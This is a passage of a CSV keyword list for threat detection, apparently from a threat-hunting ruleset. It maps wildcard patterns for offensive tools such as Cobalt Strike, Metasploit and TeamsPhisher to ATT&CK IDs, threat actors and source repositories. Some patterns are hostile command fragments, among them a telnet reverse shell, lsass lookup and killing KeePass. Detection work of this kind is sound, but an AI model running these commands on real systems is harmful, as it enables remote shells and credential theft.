T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z"
+"*targetedkerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*targetedkerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*targetedkerberoast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*targetedKerberoast-main*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z"
+"*targetver.h*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation 
tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z"
+"*tarunkant/Gopherus*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*tas389.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*taskkill /F /T /IM keepass.exe /FI*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*tasklist /fi *Imagename eq lsass.exe* | find *lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*tasklist /svc | findstr /i ""vmtoolsd.exe""*","greyware_tool_keyword","tasklist","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*TaskShell.exe * -b *.exe*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z"
+"*TaskShell.exe * -s *SYSTEM*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z"
+"*tastypepperoni/PPLBlade*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"*tastypepperoni/RunAsWinTcb*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of 
WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z"
+"*tcp://0.tcp.ngrok.io:*","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*tcpClient.connectTCP(*127.0.0.1*1337*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z"
+"*tcpdump *","greyware_tool_keyword","tcpdump","A powerful command-line packet analyzer.and libpcap. a portable C/C++ library for network traffic capture","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","http://www.tcpdump.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*tcpreplay*","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. 
it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*tcpshell.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*tdragon6/Supershell*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*teamserver* no_evasion.profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*teamServer*ZoomAPI.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*TeamServer.C2Profiles*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamServer.exe *github.com*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - 
T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*TeamServer.prop*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*TeamServer/Filters/InjectionFilters*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamServer/Pivots/*.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 
- T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamServer\TeamServer.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamsPhisher.git*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.log*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.py*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*TeamsPhisher-main.zip*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamstracker-main*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user 
presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*teamviewer_passwords.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*teamviewer_passwords.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*techspence/ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*tecknicaltom/dsniff*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" +"*Teensypreter.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*telegram2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TelegramRAT-main*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*telnet * | /bin/bash | telnet *","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*temp*\pp.exe*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" +"*temp*KillDefender*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" 
+"*temp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*temp*whoami.txt*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Temp\dumpert*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*temp\stager.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*templates*CSExec.cs*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*templates*HIPS_LIPS_processes.txt*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*templates*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*tenable.com/downloads/nessus*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Terminating Windows Defender?*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*test.endpoint.rapid7.com*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - 
TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*test_beef_debugs_spec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*test_ccache_fromKirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*test_crawler.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*test_invoke_bof.x64.o*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
